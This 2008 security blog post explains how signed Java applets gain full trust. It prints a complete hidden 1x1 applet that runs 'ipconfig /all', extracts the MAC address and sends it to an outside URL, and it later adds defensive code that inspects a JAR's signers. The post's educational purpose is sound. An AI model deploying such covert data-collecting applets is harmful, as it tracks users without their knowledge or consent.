Trusting Java Applets

Posted: October 28, 2008 in security

It’s been blogged before, but I always learn by example, so here is an example. The thing I’m talking about is trusting signed Java applets. In short, when you trust a Java applet it can do whatever it wants. So what could you do with a Java applet? The Java source code below steals your MAC address; rather useless, but it serves the purpose of the example well enough. The stolen MAC address gets submitted to a page, in this case Google, and the request looks like this:

http://www.google.com/bleh=00-0C-29-F6-E2-A8

So on the server side you can just match IP + MAC address and build yourself a (maybe) useless database. You could also write code that does more evil stuff than just stealing the MAC address.

Are you wondering how to sign a Java applet? Visit the following URL:

http://java.sun.com/j2se/1.5.0/docs/guide/plugin/developer_guide/rsa_signing.html

The HTML code to embed the applet in your HTML page is as follows:

<HTML>
<HEAD>
<TITLE>Get MacAddress Applet</TITLE>
</HEAD>
<BODY>
Get MacAddress applet<BR>
<applet code="GetMacAddress.class" archive="GetMacAddress.jar" width=1 height=1>
<PARAM NAME="BASEURL" VALUE="http://www.google.com/bleh=">
</applet>
</BODY>
</HTML>

So now for the example code of the “evil” applet.

import java.applet.Applet;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * This applet gets the MAC address from a Windows machine
 * @author DiabloHorn
 */
public class GetMacAddress extends Applet {

    /** Runs when the applet loads: reads the MAC address and sends the browser to BASEURL + MAC. */
    public void init() {
        try {
            String macAddress = this.getMacAddress();
            URL url = new URL(this.getParameter("BASEURL") + macAddress);
            getAppletContext().showDocument(url, "_self");
        } catch (Exception e) {
            System.out.println(e);
        }
    }

    public String getMacAddress() throws IOException {
        String macAddress = null;
        String command = "ipconfig /all";
        Process pid = Runtime.getRuntime().exec(command);
        BufferedReader in = new BufferedReader(new InputStreamReader(pid.getInputStream()));
        while (true) {
            String line = in.readLine();
            if (line == null) {
                break;
            }

            // (?:...) is a non-capturing group; group(1) is the whole MAC address
            Pattern p = Pattern.compile(".*((?:[0-9a-f]{2}[-:]){5}[0-9a-f]{2}).*", Pattern.CASE_INSENSITIVE);
            Matcher m = p.matcher(line);
            if (m.matches()) {
                macAddress = m.group(1);
                break;
            }
        }
        in.close();
        return macAddress;
    }
}
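
Since the trust decision rests entirely on the signature, it helps to see what a signature actually tells you. The following is an added example, not part of the original post: it verifies a JAR and prints who signed it, flagging self-signed certificates. The class name InspectJarSigners is hypothetical and the JAR path is assumed to be passed as the first argument.

```java
import java.io.InputStream;
import java.security.cert.Certificate;
import java.security.cert.X509Certificate;
import java.util.Enumeration;
import java.util.LinkedHashSet;
import java.util.Set;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;

/** Added example (hypothetical class): report who signed a JAR before trusting it. */
public class InspectJarSigners {
    public static void main(String[] args) throws Exception {
        // args[0] is the path to the JAR to inspect (assumption of this example).
        try (JarFile jar = new JarFile(args[0], true)) {   // true = verify signatures
            Set<X509Certificate> signers = new LinkedHashSet<>();
            int unsigned = 0;
            byte[] buf = new byte[8192];
            Enumeration<JarEntry> entries = jar.entries();
            while (entries.hasMoreElements()) {
                JarEntry entry = entries.nextElement();
                if (entry.isDirectory() || entry.getName().startsWith("META-INF/")) {
                    continue;   // skip directories, the manifest and the signature files
                }
                // Certificates are only available once the entry has been read to the end;
                // an entry modified after signing makes read() throw SecurityException.
                try (InputStream in = jar.getInputStream(entry)) {
                    while (in.read(buf) != -1) { /* drain the stream */ }
                }
                Certificate[] certs = entry.getCertificates();
                if (certs == null) {
                    unsigned++;
                    System.out.println("UNSIGNED entry: " + entry.getName());
                } else if (certs[0] instanceof X509Certificate) {
                    signers.add((X509Certificate) certs[0]);   // first cert = first signer's own cert
                }
            }
            for (X509Certificate c : signers) {
                boolean selfSigned = c.getSubjectX500Principal().equals(c.getIssuerX500Principal());
                System.out.println("Signer : " + c.getSubjectX500Principal().getName());
                System.out.println("Issuer : " + c.getIssuerX500Principal().getName());
                if (selfSigned) {
                    System.out.println("WARNING: self-signed, the signer name is unverified");
                }
            }
            System.out.println(signers.size() + " signer(s), " + unsigned + " unsigned entries");
        }
    }
}
```

A clean result only identifies the signer and shows the contents were not altered after signing; it says nothing about what the code does once it is trusted.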
Comments
  1. […] can also abuse the trust Java places in digitally signed code, I’ve blogged about this issue before. Nowadays metasploit/SET even has a ready to use module for it. If you are wondering what all this […]

  2. diablohorn says:

    If you modify the command it might work yes, I haven’t had the time to test it out. My point was more about signed applets and the endless possibilities.

  3. Aden says:

    Hi!
    As far as I know, “ipconfig /all” is for MS Windows. So do you think this applet will work on a client running Linux?

    Please answer me.

  4. wong says:

    Hi,

    Do you have java/applet code that can get the real ip? Thanks…

    Regards,

    Wong
